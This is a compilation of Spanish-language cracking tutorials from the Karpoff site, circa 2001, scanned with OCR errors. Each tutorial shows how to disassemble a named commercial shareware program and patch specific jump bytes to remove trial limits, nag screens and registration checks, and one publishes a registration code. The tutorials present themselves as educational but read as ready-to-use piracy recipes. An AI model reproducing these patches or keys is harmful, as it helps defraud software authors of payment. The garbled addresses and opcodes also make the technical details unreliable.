00003400 7526 6AFF 6A00 686B 4E00 O0E8 1509 DEDO usj.j.hkN....... 
000034D0 8D4D E4C6 45FC 00E8 969E ODOO C745 FCOE .M..E........ Ea 


Y si te fijas ves el código hexademial que nos daba en el W3Dasm 7526, bueno pues cambialo por EB26, como te 
explique ante, y guardalo. 
Comprobamos y... funciona.. chupaooo verdad. 


WAVE Editor de Nero 5.5.0.3 


Bueno vamos a por la otra utilidad la ejecutamos y sorpresa. 
Your demo version has expired! 


Avispados que somos vamos y abrimos el fichero WaveEdir.EXE, pero mierda que poco ha tardado, nos preguntamos, 
bueno pues nada busquemos la cadena de la misma forma que antes. 


No aparecej¡¡¡ jajaja bueno no te pongas nervisoo00o.... 

Miremos el directorio ummmmmm dos librerías, recuerda que en las librerías tambein puede haber cogido ejecutable , 
bueno vemos.... 

vítt.dll 

waveedit.dll 

Bueno deducimos que es mas posible que este en waveedit.dll que en vfft.dll, aunque no en todos los casos es igual, 
vamos a comprobarlo. 


Cogemos el W32Dasm y abrimos la librería waveedit.dll, y que vemos ummmm esto parece tener chicha, vale pues 
vamos a buscar el texto Your demo. 


ChaChanmn... aquí lo tenemos.... el procedimiento es igual al anterior, vemos un poco mas arriba el salto, nos situamos 
en el el y leemos el offset, ahora abre el editor, y al igual que antes busca el offset y cambia el 75 por un EB. 


Si tienes alguna duda pont en contacto conmigo apostol28 Chotmail.com, aunque siendo tan sencillo no creo que las 
tengas. 


Saludos a todos, sobre todo a los componentes de la web de Karpoff. 
ADeeJay” 2001 


http://deejayweb.cjb.net 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


sobre 
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Programa: | Buscon explorer 2.1 


File insPEctor, UPX 1.0, W32dasm, Editor Hexadecimal 


paña a a 


INTRODUCCION 


Este programa tiene una proteccion de 30 ejecuciones, despues de las cuales el programa deja de funcionar si no 
se le introduce el numero de serie correcto. 


B Este programa es Shareware y caduca a las 30 ejecuciones del programa, 
USscCOo si ya has gastado las 30 ejecuciones con alguna versión anterior del programa 
Expl ore e 1 deberas registrarte para que te funcione. 


Javier Gracia Boné 
C¿Mayor n* 115 
C.P. 22270 Almudévar (HUESCA) 


Por solo 1000 ptas|[NOMBRE: 
IN APELLIDOS: 
DIRECCION: 
Registrar | Ps POBLACION: 
si 


Enviar mail de confirmación de datos Imprimir 


Yo me he decidido a atacarlo quitando el limite de ejecuciones. 


Las herramientas las podeis encontrar en la pagina de karpoff (http://g0.to/karpoff), salvo UPX 1.0 que la 
encontareis en http://protools.cjb.net/. 


Que quede claro que esto es solo educativo. Si el programa te gusta, ¡¡¡registrate !!!, que como dice su autor "son 
solo 1.000 ptas" 


AL ATAKE 


Antes de nada pase el programa por el file insPEctor para ver como estaba hecho el programa 
9, file insPEctor w3.5 - VIiPER[K-FoR] 


<A Datos PE | (4 Secciones | S Importaciones/Exportaciones | 
| E) Herramientas |  <%Modificar |  hacercade.. | 


Reconocimiento de signaturas 


Compilador: UPX Y1.01 


Signatura: 


Versión de la librería: fr «0 Información... EP Enviar signatura... 


Versión del enlazador: [2.25 Versión de la imágen: fo.o 
Versión del SO; fi 0 Versión del Subsistema: fa. 


ES Abrir archivo... y Analizar (Y Salir 


[C:icomunicatbuscon20'Buscon2.exe 


y como vemos nos dice que esta comprimido con UPX 1.01. 
Para descomprimirlo intentamos usar el 'procdump', pero vemos que no puede descomprimirlo. 
Usaremos un descompresor para UPX, llamado: 


The Ultimate Packer for eXecutables Copyright (c) 1996-2001 Markus Oberhumer $ Laszlo Molnar 
http://wildsau.idv.uni-linz.ac.at/mfx/upx.html 


http://upx.tsx.org, aunque yo lo descargue de protools. 
Su forma de uso es: upx -d -obuscon.exe buscon2.exe 
con esto obtenemos el fichero buscon.exe que ocupa 1.258 Kb. 


Descomprimimos este fichero con w32dasm y miramos en las StrnRef. Hacia el final vemos: 


hacemos doble 'click' sobre ella y aparecemos: 


:004C9532 8B10 mov edx, dword ptr [eax] 


:004C9534 FF92D3000000 call dword ptr [edx+000000D8] 
200409534 A1748B4E00 mov eax, dword ptr [004ES8B74] 
:004C953F ES3443FS8FF call 0044D378 


* Possible StringData Ref from Code 0bj ->"Ya has ejecutado el programa 30 " 
=>"weces debes registrarte" 
| 


:004C0C9549 A1748B4E00 mov eax, dword ptr [004E8B74] 
:004C0954E ES6588F6FF call 00431DB8 


* Referenced by a (U)nconditional or (Cjonditional Jump at. Addresses: 
1:004C8792 (0), :004C90AF(0), :004C9508(C) 

1 

:004C29553 33C0 xor eax, eax 


un poco mas arriba, vemos: 


:004C94F7? DFEO Ístesw ax 

:004C94F9 9E sahf 

:004C94FA 720E jb 004C950A 

:004C94FC DB6DFO fld tbyte ptr [ebp-10] 
:004C94FF D81DC4974C00 fcomp dword ptr [004C97C4] 
:004C9505 DFEO fstsw ax 

:004C9507 9E sahf 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004C94FA(C) 


El primer salto :004C9FA salta cuando hemos pasado las 30 ejecuciones a la zona peligrosa por lo que procederemos 
a 'nopearlo' (9090) para que nunca salte. Ya sabes el procedimiento: obtenemos su offset (CS8FA), vamos al editor 
hexa y con Ctrl-G vamos a la direccion, realizamos los cambios y grabamos. 


Con el seguno salto :004C9508 el procedimiento es el contrario. Queremos que siempre salte para que evite la zona, es 
decir, cambiamos '76' po 'EB' convirtiendo 'jbe' en '¡mp'. Realizamos los mismos pasos de antes para fijar los cambio 
con el editor hexa. 


El programa ya esta crackeado y vemos que al ejecutarlo ya no tiene limitaciones. 


pericogO hotmail.com 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Brain Wave Generator 3.1.3 


Número de serle. 
Buscar un Numero de Serie valido o parchar el Programa para ser usuario registrado 


Este programa produce ondas que sincronizan ambos hemisferios 
cerebrales para diversos estados de conciencia 


Principiante 
http:-Wwww.bwgen.com 
Win32dasm con Help/Quick Edit 


3d0$ FECHA: 15/04/2001 


INTRODUCCION 


Saludos a todos los que se inician en el agradable arte del cracking. La herramienta que vamos 
a usar es w32dasm 8.93 pero con la opción de Quick Edit en su menú Help. Esta la consigues 
en Karpoff como plug-in. Así nos evitamos tener que abrir otro programa como Hiew para hacer 
los cambios. 


Lo más importante del arte del cracking es ENCONTRAR DÓNDE hacer el crack y POR QUÉ 
allí. Todo lo demás es tecnología. Por lo tanto vamos a iniciar una primera aproximación al 
baby. 


AL ATAKE 


A lo que vinimos chencha! como dice un grán pridfesOr que conocí en mis años mozos. Al 
abrir el programa nos encontramos con una nag de "Unregistered..." que nos da la opción de 
anotar un número de serie con el name respectivo. Si llenamos las casillas con 3d0$ como 
name y 1234 como serial sale el tradicional "Invalid..." . Al entrar a la opción Help vemos que 
tiene tiempo limitado a 30 días y que por ser shareware no puede importar presets 


Por lo tanto, desensamblamos el programa en w32dasm y vemos las referencias. !Fácil! todo 
está allí! jejejeje por lo tanto pongamos la mejor cara :-(((, así no. !tonto!... así :-))) y 
analicemos: 


Como yo quiero aparecer registrado buscaré "Registered to" y lo encuentro con el ID 00101 y 


doy varias veces doble click para ver cuántas veces aparece la string en el listado de w32dasm 
y aparece dos veces. 


Primera vez: 


* Referenced by a (U)jnconditional or (C)onditional Jump at Address: 
|:0040949B(C) 
| 


:004094DÓ6 BBOD80654600 mov ecx, dword ptr [00466550] 

:D004094DC B6D442428 lea eax, dword ptr [esp+285] 

:D004094E0 6800010000 Ub 00000100 

* Possible Reference to String Resource ID=00101: "BrainWave Genera 
| 

:D004094E6 6A65 push 00000065 


SP A ¡| 


La primera vez, como en la figura, vemos arriba que en 40949b se hizo el salto y cuando voy a 
esa instrucción, me encuentro que si cambio el 74 por 75, o sea je por ¡ne voy a aparecer 
registrado aunque no lo esté. Por lo tanto abro la ventana Help de w32dasm y doy clic en 
Quickedit para anotar la dirección 0040949b, luego goto y escribo el cambio de 4 por 5 y luego 
save en quickedit. 


La segunda vez que aparece registered to es en la dirección 409761 y el salto es ordenado 
desde 409726. Aquí repetimos cambiar 74 por 75 como en la primera vez. Falta todavia una 
aparición de la string registered to que se identifica como ID 00154 en la ventana de 
referencias de w32dasm. Al dar doble clic varias veces, vemos que sólo se da una vez y el 


salto fué ordenado en 41edf3 y allí cambiamos 0f84 por 0f85 usando el quickedit como en la 
primera vez. Con estos trés cambios le estamos diciendo al programa que nos anote como 
registrados aunque no lo hayamos hecho. 


Si en Quickedit le damos run al programa, aparecerá registered to y no habrá nags. 


Al tratar de importar algún preset aparece un messageboxa que nos dice que "Importing 
presets is not available in the shareware version" . Buscamos esa string en el cuadro de 
referencias de w32dasm y la encontramos con el número de identificación 01313. Al darle clic 
varias veces nos encontramos con dos apariciones de la string y nos detenemos en la primera 
de ellas: 


: 0041B696 393D206E4600 
¿Dl TOTES 
:0041B69E B63FEFF 

: D0041B6A1 “7507 

: DO41B6A3 56 


* Reference To: 


:0041B6A44 FF15D5614400 


KERNEL32.CloseHandle, 


cmp dword ptr [00466520], edi 
jne 0041B6BA 

cmp esi, FEFFEFFEE 

jne D041B6AA 


push esi 


Ord: 001Bh 


| 
Call dword ptr [004461D8] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:0041B6A1 (C) 
| 

:D0O41B6AA 5E 
:D041B6AB 5E 
:DO41B6AC 5D 


* Possible Reference to String 


:D0041B6AD BS821050000 
:0041B6B2 5B 

:D041B6B3 81c4Cc0080000 
:0041B6B9 C3 


pop edi 
pop esi 
pop ebp 


Resource ID=01313: 
mov eax;,; 
pop ebx 
add esp, 
ret 


"Importing presets 
00000521 


o00008co 


Vemos que la orden de salto a importing está en 41b6a1 y la invertimos de je a jne. Si 
observamos con más cuidado veremos que el salto anterior a éste; me refiero a 41b69c, 
ordena saltar hacia afuera de la subrutina cuyo ret está en 41b6b9 y por lo tanto, debemos 
parcharlo también invirtiéndolo. Cambiamos 74 por 75. Así hay importing presets aunque sea 


shareware. 


La segunda vez aparece en 41b990 y el salto es ordenado desde 41b863. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0041B863 (C) 


BB442410 mov eaxXx, dword ptr [esp+10] 
:0041B961 S83ESEFE cmp eax, FEFEFFFFEEF 
:0041B984 7407 Je 0041B98D 


* Reference To: KERNEL32.CloseHandle, Ord:0D01Bh 


: 00418957 FFE15D56614400 Call dword ptr [004461D8] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0041B9584 (C) 


:0041B98D SE pop edi 
:0041B98E SE pop esi 
:0041B95E 5D pop ebp 


* Possible Reference to String Resource ID=01313: "Importing presets 


: 00418990 Bs821050000 mov eax, D0000521 


Al saltar a esa dirección vemos 0f85 y lo invertimos a 0f84. 


Pregunta; Por qué no parchamos en 41b984? Les dejo la tarea; y... recuerden que la 


característica principal de los crackers es su curiosidad según el maestro +ORC; por lo tanto 
investiguen. 


Disclaimer (debe ser el nombre de algún cracker porque siempre aparece en todos los tutos): 


Este tutorial tiene como finalidad aprender; por lo tanto si deseas usar el programa entonces 
Icómpralo! 


Ya con esta me despido deshojando una rosita. Cordialmente 3d0$ !jejejeje! 
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Programa: Fractions n Decimals v4.2 


PROTECCION: Serial. 

Objetivo: Encontrar el número de registro 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD: http: //davegior.home. att. net 

Herramientas: file insPEctor v4.2001, W32Dasm v8.93 parchado para visual basic 
CRACKER: Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo quinto tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 
tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SOLO CON PROPOSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa 


Realiza todo tipo de operaciones matemáticas con fracciones 


Fractions es un sencillo pero muy útil programa si usas fracciones. Es capaz de convertir números decimales a 
fracciones y viceversa, además de realizar multitud de operaciones matemáticas con fracciones. Simplemente 
introduce un número decimal o fracción y selecciona la operación deseada en el claro interfaz. 


Lo que nos interesa...el programa es shareware con un límite de 30 usos, luego de esto si quieres seguir 
usando el programa deberás pagar la suma de $9.95 dólares. 


Pero tranquilos porque contamos con...la malísima protección de este programa :) 


| Manos a la Obra | 


Antes de abrir el programa lo analizamos con file insPEctor v4.2001 el que nos mostrará información 
realmente importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará lo siguiente: 


e Compilado con Microsoft Visual Basic 5 
A continuación... cerramos file insPEctor v4.2001 y abrimos Fractions n Decimals v4.2 
Abrimos el programa y nos aparece un cuadro que dice lo siguiente: 
WARNING! 
THIS PROGRAM WILL EXPIRE IF NOT 
REGISTERED 


Es decir, ADVERTENCIA! ESTE PROGRAMA EXPIRARÁ SI NO ES REGISTRADO, guau! ya vamos conociendo a 
estos tipos que desde el primer momento nos "invitan" a comprar su producto :); en el mismo cuadro está el 
sitio en donde debemos colocar el código de registro y como hacemos siempre lo llenamos con cualquier 
cosa, le damos al botón Register y por supuesto que el programa no aceptará el código de registro y nos 
mostrará un mensaje como este... 


Fractions n Decimals 


Registration number NOT correct 


A continuación... cerramos Fractions n Decimals y abrimos W32Dasm 


Usando el W32Dasm 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos 
la carpeta en donde está instalado el programa y abrimos el archivo Fractions.exe 


Una vez desensamblado el archivo vamos a Refs > String Data References y buscamos aquel mensaje que 
nos decía que el registro era inválido, pero mientras iba bajando me encontre con una sorpresa que luce así... 


127132 
"27/64" 
"29/32 
"29/64" 
"2E4A9FF7" 
"3/16" 
EE 

"3/4" 

"3/64" 


Parece un código de registro,no? Pues si muchachos ya lo tenemos y fue así de simple, en cosa de 1 minuto 
ya tenemos el código, ahora vamos al cuadro/caja de registro y lo insertamos... 

Code Key: 2E4A9FF7 

Le damos click a Register y... programa registrado. 

Nota: 


e El número de ejecuciones del programa está guardado en el archivo Slt.d1l, el que puede ser alterado 
sin dificultad alguna y extender el número de usos. 


e El registro queda guardado en el archivo Btsw.d1!. 


Programa crackeado. . 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoGU'hotmail.com 


| Saludos | 


e PrOfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


| Chao!! | 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 
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Karpoff Spanish Tutor 


Programa: Atomix MP3 v1.12 

PROTECCION: nag, opciones deshabilitadas... 

Objetivo: simular registro 

Descripcion: un dj en tu pc!! 

Dificultad: newbie 

DOWNLOAD : http://www. atomixmp3.com 

Herramientas: W32dasm Editor Hexadecimal 

CRACKER: smAs|-| s !<eggom FECHA: 16/02/01 
INTRODUCCION 


un tutorial más.. me tomé un descanso y ahora vuelvo con un programa para los djs.. muy simple y 
manejable.. la protección??.. un simple mensaje.. pero ya veremos.. 


para éste programa utilizaremos el w32 dasm y un editor hexa.. muy buen programa para quitar las nags.. 
como siempre, éste texto es sólo para fines intelectuales y está hecho de un newbie para un newbie.. 


empecemos!!! 


AL ATAKE 


primero, instalamos el programa y abrimos el ejecutable atomixmp3.exe ahora.. damos click en 
inferior izquierda> y ahora en "Sound Config...” tratamos de cambiar la configuración y.. cha chan!! 


<en la parte 


sólo está disponible en la versión completa.. <tal vez..> y bueno.. felicidades!! ya encontramos la primera nag!! creo 
que es todo... vamos a ponernos a oír música.. 


<escojan su canción favorita y mézclenla!!> 


qué?? qué es esto?? 


adivinaron!! otra nag!! aproximadamente a los 15 minutos de uso nos la muestra.. hmm.. ésto me huele mal.. cerramos 
el ejecutable y lo analizamos con el file insPEctor.. 


ahora vemos que está hecho en C++.. procedemos a desensamblarlo.. 


no tarda mucho.. sólo unos instantes.. ahora.. ya!! 


damos click en [Es] para ver las referencias.. casi al final están los textos de las 2 nags.. 
"This configuration is only available " 
"This is only a trial version of " 


damos doble click en la primera y aparecemos aquí.. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00408309(C) 


:0040832A 83F802 cmp eax, 00000002 
:0040832D 7C1F jl 0040834E 
:0040832F 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"AtomixMP3" 


| 
:00408331 686C344200 push 0042346C 


* Possible StringData Ref from Data Obj ->"This configuration is only available " 
->"in the full version." 


| 
:00408336 68AC394200 push 004239AC 
:0040833B 56 push esi 


ok.. vemos que arriba hay un salto condicional.. lo apuntamos y vamos a Goto>Code Location, apuntamos 00408309 y 
llegamos a un salto... 


:00408309 751F ¡ne 00408324 

vemos el offset <el que está hasta abajo y termina con.. h> 
8309.. 

parece que ya tenemos una pista.. 

ahora vamos por la segunda nag.. 


* Referenced by a CALL at Address: 
1:0040A72F 


:0040FBAO 56 push esi 

:0040FBA 1 8BFl1 mov esi, ecx 

:0040FBA3 8B0D547B4200 mov ecx, dword ptr [00427B54] 
:0040FBA9 6A0O0 push 00000000 

:0040FBAB 6A00 push 00000000 

:0040FBAD 8B01 mov eax, dword ptr [ecx] 

:0040FBAF FF5004 call [eax+04] 

:0040FBB2 8B0D547B4200 mov ecx, dword ptr [00427B54] 
:0040FBB8 6A00 push 00000000 

:0040FBBA 6AO01 push 00000001 

:0040FBBC 8B 11 mov edx, dword ptr [ecx] 

:0040FBBE FE53204 call [edx+04] 

:0040FBC1 A12C7B4200 mov eax, dword ptr [00427B2C] 
:0040FBC6 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"AtomixMP3" 
| 
:0040FBC8 6860344200 push 0042346C 


* Possible StringData Ref from Data Obj ->"This is only a trial version of " 
->"AtomixMP3." 


:0040FBCD 68343A4200 push 00423A34 
:0040FBD2 50 push eax 


nos dice que hay una referencia de una call.. GoTo>Code Location y apuntamos.. 0040A72F para llegar.. 
:0040A72F E86C540000 call 0O40FBAO 


parece que hay que bloquear ésta call.. vemos el offset..A72F y cerramos el w32dasm y abrimos el editor hexa.. 


abrimos el ejecutable.. una vez hecho ésto vamos a Edit>GoTo y apuntamos.. 8309.. llegamos a 751F.. bloqueamos el 
75 con 74 <para qué?? bueno.. 75 es un "salta si no es igual" en pocas palabras: "salta si no estás registrado a la nag", 
al cambiarlo por 74 le decimos "salta si es igual" o "salta como si estuvieras registrado", de manera que podamos 
usarlo como si estuviéramos registra2..> de manera que quede 741F.. ahora sí.. pero sólo vamos a la mitad, falta la otra 
nag.. 


otra vez a Edit>GoTo.. A72F y llegamos a.. ES6C540000 y lo sustituímos por 9090909090 <porqué tanto 907? porque 
es la misma longitud de ES6C540000, o sea.. 10 bits.. recordemos que cada bit son 2 espacios, un par así que los 
sustituímos por "no hagas nada", 5 90s, me expliqué??> para que ya no salga esa nag.. 


ahora abrimos el programa y lo usamos normalmente.. ninguna nag!! programa crackeado!! 


ahora nada más falta el pequeño mensaje al abrir el programa, pero con resource hacker podemos quitarlo o 
intercambiarlo por el que dice que estamos registra2..<obviamente nada más es un detalle estético, por eso no lo 
agregué en el tutorial> 


>>>despedida.. 


me siento muy contento al poder hacer otro tutorial.. gracias a k-for por sus 
maravillosos tutoriales, también por el gran file insPEctor y al profesor_x por su 
compilación de tutoriales 


también agradezco a karpoff y a sus webmasters por ayudar a los newbies <como yo> 
con sus tutoriales y por recibir los míos.. y a los foros de WKT! échenle un vistazo!! 


gracias también a la gente que lee mis tutoriales <aunque digan que pierden su 
tiempo!!> 


¡por último, les recomiendo echen un ojo por éstas páginas... 


AZTIAnKIlAn 


Karpoff Spanish Tutor 


WKT! Foro 
TutoLetal 
¡K-For 


hasta la próxima!! 
dudas? comentarios?? 


smash O gamehacks.net 


recuerda: éstos textos son exclusivamente para fines intelectuales.. de ninguna 
manera tratamos de perjudicar a los programadores.. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Undelete (Software Shelf File Demo 
Edition) 


Demo, limita los archivos recuperados, y tiene un tiempo de 
prueba. 


Hacerlo totalmente funcional. 
Programa para recuperar archivos borrados. 
Novato.. 


www.softwareshelf.com 


W32dasm (para Visual Basic), un Editor Hexadecimal (p.ej 
HexWorkshop 2.54), y el programa The Customiser. 


kamui FECHA: 31/03/2001 


INTRODUCCION 


Bueno chicos otra vez estoy aqui para explicarles como funciona otro sistema de protección. El programa es 
una utilidad muy buena para recuperar ficheros ya borrados del disco duro. Yo la he probado y semejante al 
Recover4All ( estudiado por el compañero Nopper ). 

Este programa sino le introduces un serial correcto durante la instalación,se convierte en un programa 
DEMO, yo no se lo pondré, estaremos en modo demonstración por lo que no nos dará la posiblidad de 
registrarlo. Su limitación consiste en el que cuando recupera solo 2 archivos, expira !!, por lo que no facilita 
nada su evaluación con este sistema. Tambien creo que tiene limite de tiempo, pero eso no me ha dado 
tiempo ha comprobarlo. jeje ;-) 


AL ATAKE 


Bueno vamos a probar al programilla este haber que nos puede ofrecer...Bien después de cargar el programa, 
analizamos los discos duros, ah y vemos 3 archivos que borramos en su dia y que nos interesaría volver a tenerlos, 
muy bien este programa nos da esa posibilidad. Los señalamos y le damos a recuperar ( mediante la acción 
UNDELETE ), y, ups , solo nos recupera 2 archivos y EXPIRA !!: 


Notice -- Limited use demo Demo Expiration 


This is a limited use demo yersion. Your demo version of the file recovery program has now expited. 
This program will expire after 2 files are recovered 


Comorrrrrr?, 
ya no 
podemos usar más esta cosa ya hemos acabado el tiempo de evaluación !!. Esto no puede ser y debemos solucionarlo: 


Desensamblamos ( con el w32dasmVB, porque esta hecho en VBasic), y buscamos estas 2 cosas tan feas....con las 
STRINGS REFERENCES: 


:00411C95 FEDÓÉ call esi 

:00411C97 E97C050000 ¡mp 00412218 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :00411C89(C) | 

:00411C9C E8B9510300 call 00446E5A 

:00411CA1 8B4004 mov eax, dword ptr [eax+04] 

:00411CA4 8B481C mov ecx, dword ptr [eax+1C] 

:00411CA7 6A00 push 00000000 

* Possible StringData Ref from Data Obj ->"Notice -- Limited use demo" 

| :00411CA9 6848584600 push 00465848 

* Possible StringData Ref from Data Obj ->"This is a limited use demo version. " 
| :00411CAE 68EC574600 push 004657EC 

:00411CB3 E8E90E0200 call 00432BA1 

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:00411DOB(U), :00411D0F(C) | 

:00411CB8 8B442414 mov eax, dword ptr [esp+14] 

:00411CBC 50 push eax 

* Reference To: ADVAPI32.RegCloseKey, Ord:0184h ===>Donde se lleva la cuenta de los archivos recuperados. 


| :00411CBD FF150C204500 Call dword ptr [0045200C] 


:00411CC3 85CO0 test eax, eax 

:00411CC5 7408 je 00411CCF 

:00411CC7 50 push eax 

:00411CC8 FFEDÉ call esi 

:00411CCA E8110CFFFF call 004028E0 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00411CC5(C) | 

:00411CCF 8B442454 mov eax, dword ptr [esp+54] 

:00411CD3 85CO0 test eax, eax 

:00411CD5 7F36 jg 00411D2D ===> Tras la comprobación, salta si todavia el prog. no ha expirado. 
:00411CD7 E87E510300 call 00446E5A 

:00411CDC 8B4004 mov eax, dword ptr [eax+04] 

:00411CDF 8B481C mov ecx, dword ptr [eax+1C] 

:00411CE2 6A00 push 00000000 

* Possible StringData Ref from Data Obj ->"Expired Demo" 

| :00411CE4 68DC574600 push 004657DC 

* Possible StringData Ref from Data Obj ->"The demo usage on this limited " 
->"use demo has expired." 

| :00411CE9 6894574600 push 00465794 ====> Aqui cuando ya expira. 
:00411CEE ESAE0E0200 call 00432BA 1 

:00411CF3 6A00 push 00000000 

:00411CFS5 FED6E call esi 

:00411CF7 E91C050000 ¡mp 00412218 ,,,,nos manda a la salida, no recupera los archivos. 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00411C60(C) | 

:00411CFC 3DEA000000 cmp eax, OOOODOEA 

:00411D01 750A jne 00411DOD 


:00411D03 50 push eax :00411D04 FFDÉ call esi 


:00411D06 ESDSOBFFFF call 004028E0 

:00411DOB EBAB jmp 00411CB8 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

1:00411D01(C) | 

:00411DOD 85CO0 test eax, eax 

:00411DOF 74A7 je 00411CB8 

:00411D11 50 push eax 

:00411D12 FED6 call esi 

:00411D14 ESC70BFFFF call 004028E0 

:00411D19 6A00 push 00000000 

:00411D1B FFDÓÉ call esi 

:00411D1D 8B542414 mov edx, dword ptr [esp+14] 

:00411D21 52 push edx 

* Reference To: ADVAPI32.RegCloseKey, Ord:0184h 

| :00411D22 FF150C204500 Call dword ptr [0045200C] ,,,Si salta aqui, todo va sobre ruedas. 
:00411D28 E9EB040000 ¡mp 00412218 

+4++++Bueno este es el 1? salto que debemos cambiar para conseguir el objetivo.+++++ 
Debemos conseguir ahora eliminar lo del Demo Expiration: ....buscamos y : 


* Possible StringData Ref from Data Obj ->"Uinit5"------ >curioso nombre de la cadena en el registro que lleva la 
cuenta atrás en los ficheros recuperados. 


| :004122A9 6864584600 push 00465864 

:004122AE 50 push eax 

* Reference To: ADVAPI32.RegSetValueExA, Ord:01B2h 
| :004122AF FF1510204500 Call dword ptr [00452010] 
:004122B5 85CO0 test eax, eax 

:004122B7 7408 je 004122C1 

:004122B9 50 push eax 


:004122BA FFEDÓÉ call esi 


:004122BC E81F06FFFF call 004028E0 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:004122B7(C) | 

:004122C1 8B4C2414 mov ecx, dword ptr [esp+14] 

:004122C5 51 push ecx 

* Reference To: ADVAPI32.RegCloseKey, Ord:0184h 

| :004122C6 FF150C204500 Call dword ptr [0045200C] 

:004122CC 85CO0 test eax, eax 

:004122CE 7408 je 004122D8 

:004122DO0 50 push eax 

:004122D1 FEDÉ call esi 

:004122D3 E80806FFFF call 004028E0 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:004122CE(C) | 

:004122D8 8B442454 mov eax, dword ptr [esp+54] 

:004122DC 85CO0 test eax, eax 

:004122DE 7F17 jg 004122F7 ===>Salta y no aparecerá ningún mensaje tonto. 
:004122E0 6800000100 push 00010000 

* Possible StringData Ref from Data Obj ->"Demo Expiration" 

| :004122E5 6840574600 push 00465740 ===> Aquí si todo nos va mal, jeje... 
* Possible StringData Ref from Data Obj ->"Your demo version of the file " 
->"recovery program has now expired." 

| :004122EA 6800574600 push 00465700 

:004122EF 6A00 push 00000000 

* Reference To: USER32.MessageBoxA, Ord:01C3h 

| :004122F1 FF1584264500 Call dword ptr [00452684] 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:004122DE(C) | 


:004122F7 8D4C245C lea ecx, dword ptr [esp+5C] ,,, si estamos por aqui todo irá bien. 
:004122FB C644244C00 mov [esp+4C], 00 

:00412300 ESDE2A0200 call 00434DE3 

La cosa, resumiendo está clara como el agua, debemos cambiar: 
:00411CD5 7F56 jg 00411D2D=> :00411CD5 EB56 ¡mp 0041D2D 

:004122DE 7F17 jg 004122F7==> :004122DE EB17 ¡mp 004122F7 


Bueno lo único que nos queda y que no es imprescindible pero si bonito es con el programa The Customiser es 
cambiar algunas cosas que pueden molestar "algo" la vista, como p. ej.: 


F > Software Shelf8 File Rescue demo edition. MOR 


DES AT TAM TAM Bueno chicos lo demás os lo dejo a vosotros, jeje...... 


NOTA I“:Este tutorial está expresamente redactado para estudiar el sistema de protección del programa, deshabilitarlo, 
para poder evaluarlo mejor , y ya está. Si quereis seguir usandolo, y vuestro bolsillo os lo permite comprarlo, sino 
respetar el shareware. 


NOTA 2“:Este tutorial puede ser libremente distribuido pero se debe indicar el AUTOR y el PROPÓSITO. 


Un saludo a todos los crackers españoles, a los del canal ttcrackers del IRC-hispano, y a los del Tutoriales-2000, y a 
Karpoff por poner mis tutoriales. 


Para cualquier cosa: kamui_latinmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


ArtGem V1.2 


Limitación de Tiempo. 

Evitar la limitación de tiempo (en realidad la nag). 

Según ellos: Powerful image editor for multimedia graphics 
Novato. 

http://www.rlvision.com 

W32dasm, Editor Hexadecimal 


Lutino FECHA: 9/4/2001 


INTRODUCCION 


Este programa tiene un periodo de evaluacion de 30 dias, despues de los cuales... continua funcionando, pero 
siempre nos aparecera la nag indicandonos lo malos que somos. 


Nag de ArtGem V.12 


Antes de esta nag aparece otra en la cual se ve el nombre de usuario y la compañia que introducimos si le 
damos al boton Register, pero no tiene importancia. 


Podiamos atacar por ahi, buscando el mensaje de "invalid key!" y lograr registrarnos con cualquiere numero 
